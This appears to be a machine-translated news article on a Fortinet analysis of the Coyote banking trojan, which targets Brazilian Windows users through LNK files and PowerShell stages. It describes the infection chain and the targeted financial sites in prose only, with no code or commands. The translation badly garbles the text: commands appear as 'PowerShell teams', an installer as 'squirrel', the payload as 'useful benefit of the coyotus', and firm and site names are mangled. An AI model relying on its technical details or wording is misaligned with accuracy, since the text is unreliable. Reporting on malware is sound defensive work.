Windows Brazilian users are the purpose of the company that provides a bank malicious software called Coyote.
“After the deployment of Trojan Coyote Banking can carry out various malicious activities, including keys, screenshots and displaying the submitted phisching for theft of sensitive credentials,” – Researcher Fortinet Fortiguard Labs Cara Lin – Note in an analysis published last week.
Cybersecurity company has stated that a few Windows (LNK) artifacts that contain PowerShell teams responsible for the delivery of malware have been identified over the last month.
Coyote was First documented In early 2024, Caspersorski, in detail about his attacks aimed at users in the South American country. It is able to prepare sensitive information with more than 70 financial applications.
In the previous attack chain recorded by a Russian cybersecurity firm, the executable file to install the squirrel is used to launch the Node.js application, composed of an electron, which, for its part, works on the basis of NIM to launch the shooting of the malicious useful benefit of the coyotus.
The last sequence of infection, on the other hand, begins with the LNK file, which performs the PowerShell command for the next stage from the remote server (“TBET.GONTRIGAME”, another PowerShell scenario that launches a responsible loader responsible. To perform an intermediate load.
‘Sumped code uses DonutA tool designed to decipher and execute the final MSIL (Microsoft intermediate) useful loads, “Lin said.”
“When found, it deletes an existing record and creates a new one with accidentally generated name. This new entry contains an individual PowerShell team, pointing to the download and execution of the Base64 URL”
After launch, the malicious software collects basic system information and a list of installed antivirus products on the host, after which the data is compiled to the base 64 and allocated to the remote server. It also conducts various checks to avoid the detection of sand and virtual environment.
A noticeable change in coyote’s latest iteration is to expand its target list to cover 1030 sites and 73 financial agents such as Mercadobitcoin.com.br, Bitcointrade.com.br, foxbit.com.br, ustoshotel.com.br, blumenhotelboutique. com.br and fallshotel.com.br.
If the victim tries to access any of the sites in the list, malicious software turns to the server controlled by the attacker to determine the next course of action that may vary from the capture of the screenshot to the imposed. Some of the other features include displaying keyboard activation and manipulating display settings.
“The process of infection of the coyote is complex and multifaceted,” Lin said. “This attack used the LNK file for its initial access, which further led to the opening of other malicious files. This Trojan poses a significant threat to financial cybersecurity, especially because it has the potential for expanding its original goals.”
